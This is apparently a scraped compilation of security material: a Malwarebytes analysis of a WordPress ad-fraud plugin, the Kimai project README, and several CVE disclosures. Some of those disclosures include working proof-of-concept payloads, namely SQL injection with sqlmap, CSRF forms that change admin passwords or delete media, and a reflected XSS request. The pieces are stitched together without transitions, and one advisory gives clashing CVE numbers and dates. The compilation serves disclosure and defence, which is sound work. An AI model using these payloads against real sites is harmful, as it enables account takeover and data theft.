Categories: Threat Intelligence
Tags: ad fraud

Tags:  popunder

Tags:  ads

Tags:  fraud

Tags:  wordpress

Tags:  plugins

Popunders are the ideal vehicle to serve ad fraud. In this case, we investigate a scheme where a webpage you can't see is loading a bunch of ads while code mimics user activity by scrolling and visiting links.



(Read more...)




The post WordPress sites backdoored with ad fraud plugin appeared first on Malwarebytes Labs.

WordPress is an immensely popular content management system (CMS) powering over 43% of all websites. Many webmasters will monetize their sites by running ads and need to draw particular attention to search engine optimization (SEO) techniques to maximize their revenues.

But some people will take a shortcut to gaining traffic by engaging in legal but sometimes fraudulent practices. In this instance, we identified someone buying popunder traffic to promote their websites. A popunder is a very common occurrence online and consists of launching a secondary page under the current one. In itself, it could be considered simply an annoyance and is not malicious except when the website that is being launched uses various techniques to defraud advertisers.

We discovered a few dozen WordPress blogs using the same plugin that mimics human activity by automatically scrolling a page and following links within it, all the while a number of ads were being loaded and refreshed. The blogs would only exhibit this invalid traffic behavior when launched from a specific URL created by this plugin, otherwise they appeared completely legitimate.

In this post, we share the technical details behind this ad fraud scheme and any clues pointing to the developer of this WordPress plugin.

**Key findings**

*   About 50 WordPress blogs have been backdoored with a plugin called fuser-master
*   One of the blogs performing this ad fraud had 3.8 M visits in January, with an average visit duration of 24:55 minutes and 17.50 pages per visit
*   This plugin is being triggered via popunder traffic from a large ad network
*   The WordPress sites are being loaded in a separate page underneath and display a number of ads
*   The plugin contains JavaScript code that mimics the activity of a real visitor: scrolls the page, clicks on links, etc.
*   The code also monitors for real human activity (mouse movement) and will immediately stop the fake scrolling when that happens

_Figure 1: Diagram summarizing ad fraud case_

**Fuser-master WordPress plugin**

Recently we blogged about ad fraud involving a popunder as well, except in that case it was using an iframe to hide the ads. Here, there is nothing hidden at all and the ad fraud can only be deduced when the page is being scrolled down, and back up at random intervals. Because it is a popunder, anyone becomes an unwitting accomplice and does not see any of the fraudulent behavior.

In this investigation, we won't be spending time on the ad network facilitating these popunders but we have a fairly good idea of which one it might be based on anti-debugging code that they used. What makes popunders particularly enticing for ad fraud is the fact they allow content to be loaded and remain until further action. Unlike the main browser window where a user can easily navigate away from the current website they are visiting, the popunder will remain open for several minutes or even hours, until it is closed.

We were able to trigger the popunder several times and noticed that the fraudsters were using several different blogs that all had the same thing in common, namely they used a plugin called 'fuser-master'. There aren't many references for this plugin such as where to download it or who its author might be. We were only able to find one mention from themesinfo.com which is a WordPress theme detector.

_Figure 2: A list of websites using the fuser-master plugin_

Not all the sites listed in the gallery still exist or are fully functional, but that still gave us a good indication of what was being used to turn standard blogs into ad fraud robots. It's worth mentioning again that when visited at their homepage, all these blogs are static in nature, meaning we don't see this kind of zombie activity where the page is scrolling by itself. In the next section, we will look at the URL entry point that triggers that specific behavior.

**User check and redirect**

All of these blogs appear typical when visited directly, so they would likely pass both a manual and human verification. However, when a special URL (the entry point) is entered with the corresponding parameters, they turn into ad fraud. Below you can see the URL path and its parameters that are being used on all the blogs where that plugin has been installed:

**/wp-content/plugins/fuser-master/entrypoint.php?**

*   e
*   Iptoken
*   websiteid
*   geo

First, the current user is checked to determine if they should be allowed to enter into the ad fraud scheme or not:

_Figure 3: Pre-check for cookies_

The fraudsters are using open redirects from Google and Twitter in an interesting way. A keyword from an array corresponding to related Google search terms is picked and added to a Google search URL:

_Figure 4: SEO trick_

That keyword is chosen randomly and makes up the dynamic redirect URL:

_Figure 5: Keyword used in redirect_

The next web request is the actual redirect code which also drops some cookies. The URL and code for the redirect will vary based on the different options set up previously:

_Figure 6: Google open redirect_ 

_Figure 7: Twitter open redirect_

The popunder will effectively load the blog via the entrypoint, then immediately leave it to re-enter via a Google open redirect as if someone had clicked on one of the search results. This is what it looks like:

_Figure 8: Animation showing open redirect mechanism_

**Faking user activity**

As mentioned previously, the blogs will only exhibit their ad fraud nature when visited via the fuser-master plugin's entry point. We know that this happens when a user was browsing the web, clicked on a page and a popunder was launched. The blog will open up in a new window **behind** the current window, which means the user is completely unaware of what is happening.

It becomes quickly obvious that there is something odd when the popunder is exposed. We notice some scrolling back and forth and somewhat randomly which truly mimics what a human would do when reading an article. When looking at the code we can see that it checks for user activity (more on that later) and only performs this scrolling activity if it has not detected real mouse movements on the page:

_Figure 9: Code for automated scrolling_

Had the popunder been the same blog without this fake scrolling there would be no reason to suspect mischief. Of course the fraudsters aren't interested in a static page without any kind of user interaction as their goal is monetization via ads. This invalid traffic needs to look as valid as possible in order to not get flagged by anti ad fraud solutions:

_Figure 10: Animation showing automated scrolling_

Another interesting aspect of this fraud is how at regular intervals, a new article is being viewed. This makes sense in the context of a standard visitor to a blog continuing on the site by following other articles that they might be interested in reading. Looking at the fuser-master's code, we see that it tries to get all internal URLs from the currently loaded page and places these links into an array. If we observe what's happening, see that after a certain number of scrolling up and down, a different article gets loaded and the scrolling resumes. This fake activity could last from minutes to hours, until it is interrupted by the real human who's currently at their computer.

**Freeze game**

At some point, the real user will close their browser or the page that was in front of the popunder. When that happens, all fake activity suddenly stops and the blog becomes static. This is a clever trick to avoid suspicion and reminds us of the 'freeze' game kids play. The fraudsters are able to detect when the mouse is being placed over the current page and can quickly stop the code from running.

_Figure 11: Monitoring for real user activity_

Figure 12: Stopping fake activity after real user is detected

**Same web developer built those blogs**

Looking through the Internet Archive, we identified an Indian web developer behind several of these sites. Some of the older posts were written by him and the layout such as the scroll bar style and test ads are also identical. There is nothing that definitely proves that this web developer created the ad fraud plugin although he had the technical skills to do so and based on his community WordPress identity was involved in a number of posts about various SEO plugins.

_Figure 13: Demo blog using a similar template reused elsewhere_

In addition, his own business website also features those blogs in his portfolio and while hovering over the thumbnails we can't help but notice a scrolling technique very similar to what we saw previously with the ad fraud.

_Figure 14: Portfolio showcasing some of the blogs_

We contacted one of his supposed customers to let them know about the fuser-mater plugin running on their site. While we did not hear back from them, within about an hour the plugin had been removed from their WordPress installation.

_Figure 15: Fuser-master plugin was deleted shortly after our notification_

If the web developer wanted to earn from this ad fraud scheme, he would need to have his own publisher IDs and overwrite the ones used by his customers, however we could not immediately verify that this was the case. It's also possible that the plugin is sold as an "add-on" and that some of his customers are fully aware of it, but we could not prove that either.

Contrary to the previous ad fraud case we looked at, this one does not simply use Google ads. Instead they are going through a number of ad platforms which makes their publisher ID and potential revenue more difficult to figure out. We do know that one of the websites featured in this investigation (momplaybook\[.\]com) had 3.8 million visitors in January, spending an average of 24 minutes and looking at 17 pages on the site (stats by SimilarWeb).

_Figure 16: Malwarebytes Browser Guard_

Visiting that same website, Malwarebytes Browser Guard blocked over a thousand ad trackers after a few minutes of sitting idle on the main page. The majority of requests came from Google's DoubleClick and OpenX which we have informed.

**Conclusion**

While popunders are a legitimate form of advertising, their very format is susceptible to abuse. For ad fraud in particular, popunders allow websites to be loaded and serve ads that will never be viewed by real humans.

The plugin we identified during this investigation is relatively simple and allows anyone with an ordinary WordPress blog to increase their earnings dramatically. Because regular visitors will come to the blog via a different flow (standard search or referral link), none of the fraudulent behaviors will be shown. All that is needed is to purchase ad space via a large popunder distributor and use the special entry point URL that triggers the fuser-master plugin.

We have shared details about this invalid traffic case with other partners in the industry.

**Indicators of Compromise**

momplaybook\[.\]com

geekextreme\[.\]com

femme4\[.\]com

mealplays\[.\]com

dorkfuel\[.\]com

automobilenews\[.\]net

thedailycute\[.\]com

beingexpat\[.\]com

klinkeltown\[.\]com

tidbitsofexperience\[.\]com

lostmeals\[.\]org

bakedoccasions\[.\]com

bakedoccasions\[.\]com

brightsidebeauty\[.\]com

cookbooksandkids\[.\]com

bowlsunset\[.\]com

thereporterz\[.\]com

basicguru\[.\]com

bonafidepress\[.\]com

geeksdigest\[.\]com

hairstylesideashub\[.\]com

techlivewire\[.\]com

thecryptosyndicate\[.\]com

theframeloop\[.\]com

thegamershub\[.\]co\[.\]uk

fastmint\[.\]com

gordigecr\[.\]it

techlivewire\[.\]com

bonafidepress\[.\]com

chaosandkiddos\[.\]com

geekandtech\[.\]com

geeksdigest\[.\]com

rec-canada\[.\]com

madassgamers\[.\]com

cravecanada\[.\]com

travelnicer\[.\]com

geartaxi\[.\]com

berrry\[.\]com

buytechstuff\[.\]com

pagehabit\[.\]com

techcola\[.\]com

techdeed\[.\]com

rebelgamejam\[.\]com

leftrightpolitics\[.\]com

followthatbitcoin\[.\]com

WordPress sites backdoored with ad fraud plugin

Cross Site Scripting (XSS) vulnerability in kevinpapst kimai2 in /src/Twig/Runtime/MarkdownExtension.php, allows attackers to gain escalated privileges.

**Cross-site Scripting in kimai/kimai**

Moderate severity GitHub Reviewed Published Feb 16, 2023 to the GitHub Advisory Database • Updated Feb 16, 2023

GHSA-r58m-v5pr-jhhq: Cross-site Scripting in kimai/kimai

Cross Site Scripting (XSS) vulnerability in kevinpapst kimai2 1.30.0 in /src/Twig/Runtime/MarkdownExtension.php, allows attackers to gain escalated privileges.

    

**Kimai - time-tracker**

Kimai is a professional grade time-tracking application, free and open-source. It handles use-cases of freelancers as well as companies with dozens or hundreds of users. Kimai was build to track your project times and ships with many advanced features, including but not limited to:

JSON API, invoicing, data exports, multi-timer and punch-in punch-out mode, tagging, multi-user - multi-timezones - multi-language (over 30 translations existing!), authentication via SAML/LDAP/Database, two-factor authentication (2FA) with TOTP, customizable role and team permissions, responsive design, user/customer/project specific rates, advanced search & filtering, money and time budgets, advanced reporting, support for plugins and so much more.

**Versions**

There are two versions of Kimai existing:

*   Version 1 — compatible with PHP 7.4, which is in maintenance mode since 2023
*   Version 2 — stable and "almost released" (waiting for some major plugins, which are not yet migrated)

**Links**

*   Home — Kimai project homepage
*   Blog — Read the latest news
*   Documentation — Learn how to use Kimai

**Requirements**

*   PHP 8.1 minimum
*   MariaDB or MySQL
*   A webserver and subdomain (subdirectory is not supported)
*   PHP extensions: gd, intl, json, mbstring, pdo, tokenizer, xml, xsl, zip

**Installation**

*   Recommended setup — with Git and Composer
*   Docker — containerized by @tobybatch

There are also documentations for:

*   developer setups — on your local machine
*   shared hostings — the least favorable option
*   Synology — you could try to host the Docker version instead
*   1-click installer — hosted environments

And if you don't want to host Kimai, you can use the Cloud version of it.

**Updating Kimai**

*   Update Kimai — get the latest version
*   UPGRADING guide — version specific steps

**Plugins**

*   Plugin marketplace — find existing plugins here
*   Developer documentation — how to create a plugin

**Roadmap and releases**

You can see a rough development roadmap in the Milestones sections. It is open for changes and input from the community, your ideas and questions are welcome.

Release versions will be created on a regular basis, every couple of weeks latest. Every code change, whether it's a new feature or a bugfix, will be done on the main branch.

For the time being and until 2.0 is widely adopted, the 1.x branch will receive bug fixes.

**Contributing**

You want to contribute to this repository? This is so great! The best way to start is to open a new issue for bugs or feature requests or a discussion for questions, support and such.

In case you want to contribute, but you wouldn't know how, here are some suggestions:

*   Spread the word: More user means more people testing and contributing to Kimai, which in turn means better stability and more and better features. Please vote for Kimai on any software platform, you can toot or tweet about it, share it on LinkedIn, Reddit or any of your favorite social media platforms. Every bit helps!
*   Answer questions: You know the answer to another user's problem? Share your knowledge.
*   Something can be done better? An essential feature is missing? Create a feature request.
*   Report bugs makes Kimai better for everyone.
*   You don't have to be programmer, the documentation and translation could always use some attention.
*   Sponsor the project: free software costs money to create!

There is one simple rule in our "Code of conduct": Don't be an ass!

**Credits**

Kimai is based on modern technologies and frameworks such as PHP, Symfony and Doctrine, Bootstrap and Tabler, and countless others.

CVE-2020-19825: GitHub - kimai/kimai: Kimai is a web-based multi-user time-tracking application. Works great for everyone: freelancers, companies, organizations - everyone can track their times, generate reports, cre

SQL Injection vulnerability in SEO Panel 4.9.0 in api/user.api.php in function getUserName in the username parameter, allows attackers to gain sensitive information.

Hi there,

I want to report a SQL Injection Vulnerability in the the current API implementation of Seo-Panel.  
In api/user.api.php, the function getUserName directly calls function __checkUserName in controllers/user.ctrl.php file without filtering on variables. Attacker can pass arbitrary string to username variable through $info. This allows injection to the __checkUsername function directly:

getUserName:

    function getUserName($info) {
        
             		$username = $info['username']; 
            		$returnInfo = array();      
            		// validate the user ifd and user info
         		        if (!empty($username)) {      
            			if ($userInfo = $this->ctrler->__checkUserName($username)) {      
            				$returnInfo['response'] = 'success';
       
            				$returnInfo['result'] = $userInfo;
         
            				return $returnInfo;
        
            			}
          
            		}
        
            		$returnInfo['response'] = 'Error';      
            		$returnInfo['error_msg'] = "Invalid username provided";      
            		return  $returnInfo;
            	}
    

\_\_checkUserName:

    	function __checkUserName($username){
             		$sql = "select id from users where username='$username'";  
            		$userInfo = $this->db->select($sql, true);      
            		return empty($userInfo['id']) ? false :  $userInfo['id'];      
            	}
    

The above-mentioned vulnerability can be reproduced by sqlmap through a request file injection.txt:

    POST /seopanel/api/api.php HTTP/1.1
    Host: localhost
    Accept: */*
    Content-Length: 118
    Content-Type: application/x-www-form-urlencoded
    Connection: close
    
    SP_API_KEY=<key_here>&API_SECRET=<secret>&category=user&action=getUserName&username=spadmin
    

with sqlmap command: sqlmap -r injection.txt -p 'username'. A boolean-based blind injection shall work, with payload similar to:  
username=123' UNION ALL SELECT CONCAT(CONCAT('abc','abc'),'abc')--  (do note that there's one space at the end of variable to bypass the original quotation mark).

CVE-2021-34117: SQL Injection Vulnerability in API function (user.api.php) · Issue #219 · seopanel/Seo-Panel

SQL Injection vulnerability in nitinparashar30 cms-corephp through commit bdabe52ef282846823bda102728a35506d0ec8f9 (May 19, 2021) allows unauthenticated attackers to gain escilated privledges via a crafted login.

**Have a question about this project?** Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Pick a username

Email Address

Password

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

CVE-2021-33925: There is a sql injection vulnerability · Issue #1 · nitinparashar30/cms-corephp

SQL Injection vulnerability in file home\controls\cart.class.php in UQCMS 2.1.3, allows attackers execute arbitrary commands via the cookie_cart parameter to /index.php/cart/num.

CVE-2020-21120: SQL Injection Prevention - OWASP Cheat Sheet Series

Cross Site Request Forgery (CSRF) vulnerability in baijiacms 4.1.4, allows attackers to change the password or other information of an arbitrary account via index.php.

**Vulnerability description**

A csrf vulnerability was discovered in baijiacmsV4.  
There is a CSRF attacks vulnerability.After the administrator logged in, open the following two page,attacker can modify the store information and login password.  
1.modify the store information.  
poc：

    <html>
      
      <body>
      <script>history.pushState('', '', '/')</script>
        <form action="http://10.0.0.128/index.php?mod=site&op=post&id=2&act=manager&do=store" method="POST">
          <input type="hidden" name="id" value="2" />
          <input type="hidden" name="sname" value="xxx" />
          <input type="hidden" name="website" value="xxx" />
          <input type="hidden" name="fullwebsite" value="http&#58;&#47;&#47;xxx&#47;" />
          <input type="hidden" name="status" value="1&apos;" />
          <input type="hidden" name="mobile&#95;url" value="http&#58;&#47;&#47;xxx&#47;index&#46;php" />
          <input type="hidden" name="mobile&#95;url" value="http&#58;&#47;&#47;xxx&#47;admin&#46;php" />
          <input type="hidden" name="submit" value="æ&#143;&#144;äº&#164;" />
          <input type="submit" value="Submit request" />
        </form>
      </body>
    </html>
    

Original store information  
  
When a logged in administrator opens a malicious web page and clicks the button  
  
And the store information has changed  

2.modify login password.  
poc:

    <html>
      
      <body>
      <script>history.pushState('', '', '/')</script>
        <form action="http://10.0.0.128/index.php?mod=site&op=changepwd&id=1&act=manager&do=user" method="POST">
          <input type="hidden" name="username" value="admin" />
          <input type="hidden" name="newpassword" value="111111" />
          <input type="hidden" name="confirmpassword" value="111111" />
          <input type="hidden" name="submit" value="æ&#143;&#144;äº&#164;" />
          <input type="submit" value="Submit request" />
        </form>
      </body>
    </html>
    

When a logged in administrator opens a malicious web page and clicks the button.  
  
And the login password of the administrator will be 111111.

CVE-2021-33396: There is a CSRF vulnerability · Issue #7 · baijiacms/baijiacmsV4

SQL Injection vulnerability in Kliqqi-CMS 2.0.2 in admin/admin_update_module_widgets.php in recordIDValue parameter, allows attackers to gain escalated privileges and execute arbitrary code.

New issue

**Have a question about this project?** Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

CVE-2020-21119: SQL Injection Vulerable. · Issue #259 · Kliqqi-CMS/Kliqqi-CMS

Cross site scripting (XSS) vulnerability in DiscuzX 3.4 allows attackers to execute arbitrary code via the datetline, title, tpp, or username parameters via the audit search.

**Description**

Admin backend audit search of content audit component with reflected-XSS in POST value “dateline”, “title”, “tpp” and “username”, which bypassed discuz security check and even could hijack callback url link, and it can also inject javascript to setTimeout at the end of html response.

**Affected Version**

DiscuzX <= 3.4, SC\_UTF8\_20221111

**POC**

1  
2  
3  
4  
5  
6  
7  
8  
9  
10  
11  
12  
13  
14  
15  
16  

POST /cms/discuz/upload/admin.php?action=moderate&operation=threads HTTP/1.1  
Host: 192.168.0.4  
Content-Length: 166  
Cache-Control: max-age=0  
Upgrade-Insecure-Requests: 1  
Origin: http://192.168.0.4  
Content-Type: application/x-www-form-urlencoded  
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10\_15\_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,\*/\*;q=0.8,application/signed-exchange;v=b3;q=0.9  
Referer: http://192.168.0.4/cms/discuz/upload/admin.php?action=moderate&operation=threads  
Accept-Encoding: gzip, deflate  
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8  
Cookie: 5Kkn\_2132\_saltkey=y03s5T45; 5Kkn\_2132\_lastvisit=1668496347; 5Kkn\_2132\_ulastactivity=07108qps3b3FkXEEZNxrT%2BtyQpXYN9%2FSOodQCNbMLoO%2BO6DOk8pF; 5Kkn\_2132\_auth=7791L55DZFdkAgcM5rDcnjIiVH0t%2BptlGCIqLkAhUIRMsUDTnq%2BGi7atBCt%2BPdyl2mCVv0hA3jA%2BxaOfDB1h; 5Kkn\_2132\_lastcheckfeed=1%7C1668501456; 5Kkn\_2132\_nofavfid=1; 5Kkn\_2132\_sid=yhpz44; 5Kkn\_2132\_lip=172.17.0.1%2C1668502019; 5Kkn\_2132\_lastact=1668502045%09admin.php%09  
Connection: close  
  
formhash=288a0c1d&scrolltop=&anchor=&username=aa&title=aa&tpp=20&filter=normal&modfid=all&dateline=604"></a><script>alert(1)</script><!--&modsubmit=%E6%8F%90%E4%BA%A4  

**Reference**

*   Gitee Issues (Login Required)
*   CVE

> Reported by Srpopty, vulnerability discovered by using Corax.

CVE-2022-45543: Vulnerability - Discuz X3.4 Backend Reflected XSS (CVE-2022-45543)

WordPress Quiz and Survey Master plugin versions 8.0.8 and below suffer from a cross site request forgery vulnerability.

RCE Security Advisory  
https://www.rcesecurity.com

1. ADVISORY INFORMATION  
=======================  
Product:        Quiz And Survey Master  
Vendor URL:     https://wordpress.org/plugins/quiz-master-next/  
Type:           Cross-Site Request Forgery (CSRF) [CWE-352]  
Date found:     2023-01-13  
Date published: 2023-02-08  
CVSSv3 Score:   6.5 (CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N)  
CVE:            CVE-2023-0292

2. CREDITS  
==========  
This vulnerability was discovered and researched by Julien Ahrens from  
RCE Security.

3. VERSIONS AFFECTED  
====================  
Quiz And Survey Master 8.0.8 and below

4. INTRODUCTION  
===============  
Quiz and Survey Master is the easiest WordPress Quiz Plugin which can be used  
to create engaging content to drive traffic and increase user engagement.  
Everything from viral quiz, trivia quiz, customer satisfaction surveys to employee  
surveys. This plugin is the ultimate marketing tool for your website.

(from the vendor's homepage)

5. VULNERABILITY DETAILS  
========================  
The plugin offers the ajax action "qsm_remove_file_fd_question" which is used to  
delete uploaded media contents from the WordPress instance. However, the  
functionality is not protected by an anti-CSRF token/nonce.

Since there is no anti-CSRF token protecting this functionality, it is vulnerable  
to Cross-Site Request Forgery attacks allowing an attacker to delete uploaded  
media contents on behalf of the attacked user.

To successfully exploit this vulnerability, a user with the right to access the  
plugin must be tricked into visiting an arbitrary website while having an  
authenticated session in the application.

6. PROOF OF CONCEPT  
===================  
The following Proof-of-Concept would delete the uploaded media with the ID "1":

<html>  
    
  <body>  
  <script>history.pushState('', '', '/')</script>  
    <form action="http://localhost/wp-admin/admin-ajax.php" method="POST">  
      <input type="hidden" name="action" value="qsm_remove_file_fd_question" />  
      <input type="hidden" name="media_id" value="1" />  
      <input type="submit" value="Submit request" />  
    </form>  
  </body>  
</html>

7. SOLUTION  
===========  
Update to version 8.0.9

8. REPORT TIMELINE  
==================  
2023-01-13: Discovery of the vulnerability  
2023-01-13: Wordfence (responsible CNA) assigns CVE-2023-0291  
2023-01-18: Sent initial notification to vendor via contact form  
2022-01-18: Vendor response  
2022-01-21: Vendor releases version 8.0.9 which fixes the vulnerability  
2022-02-08: Public disclosure

9. REFERENCES  
=============  
https://github.com/MrTuxracer/advisories

Tag

#php